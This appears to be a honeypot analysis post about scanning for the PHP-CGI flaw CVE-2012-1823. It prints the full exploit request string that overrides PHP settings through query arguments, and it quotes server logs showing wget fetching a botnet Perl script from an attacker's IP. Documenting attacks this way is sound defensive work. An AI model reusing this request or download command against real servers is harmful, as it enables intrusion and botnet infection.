In the past 24 hours, one of the WASC Distributed Web Honeypot participant's sensors picked up continued scanning for CVE-2012-1823 which is a vulnerability within PHP-CGI. Here is a screenshot taken from the ModSecurity WAF alert data:
The URLs searched for are the following:
By decoding the URL line of the request, we can see evidence of the PHP-CGI attack vector:
POST /cgi-bin/php4?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n HTTP/1.1
The bolded/highlighted section of data will be erroneously passed to the PHP command line interpreter and may allow the attacker to override specific PHP configurations. In this case, one of the key modifications is to specify "auto_prepend_file=php://input" which will allow the attacker to send PHP code in the request body. If we inspect the request body contents, we can see that the attacker is attempting to use various command-line web clients (wget/curl/fetch/lwp-get, etc...) to download the "mc.pl" script on the remote attacker's site. The "mc.pl" file is no longer available at that URL, however, Google cache shows the contents as an IRC botnet client.
By examining multiple alerts that came in from 4 distinct GeoLocations (Vietnam, India, China, and the US), we can conclude that a single attacker has modified the apache-magika.c PoC exploit code release by Kingcope. We can confirm the use of the apache-magika.c PoC code due to the exact same request headers (order and content).
Additionally, we know that this is the same attacker (regardless of the source IP/GeoLocation) data due to the use of the exact same, unique POST payload referencing the "mc.pl file on the 164.177.157.215 host.
[Sun Nov 24 9:18:46 2013] [error] [client 58.20.178.174] sh: line 1: 16726 Terminated wget http://164.177.157.215/drupal/themes/bartik/images/log/-log/mc . pl[Sun Nov 24 9:18:46 2013] [error] [client 58.20.178.174] Can't open perl script "mc.pl": No such file or directory[Sun Nov 24 9:18:46 2013] [error] [client 58.20.178.174] sh: curl: command not found[Sun Nov 24 9:18:46 2013] [error] [client 58.20.178.174] Can't open perl script "mc.pl": No such file or directory[Sun Nov 24 9:18:46 2013] [error] [client 58.20.178.174] sh: fetch: command not found[Sun Nov 24 9:18:46 2013] [error] [client 58.20.178.174] Can't open perl script "mc.pl": No such file or directory[Sun Nov 24 9:18:46 2013] [error] [client 58.20.178.174] sh: lwp-get: command not found[Sun Nov 24 9:18:46 2013] [error] [client 58.20.178.174] Can't open perl script "mc.pl": No such file or directory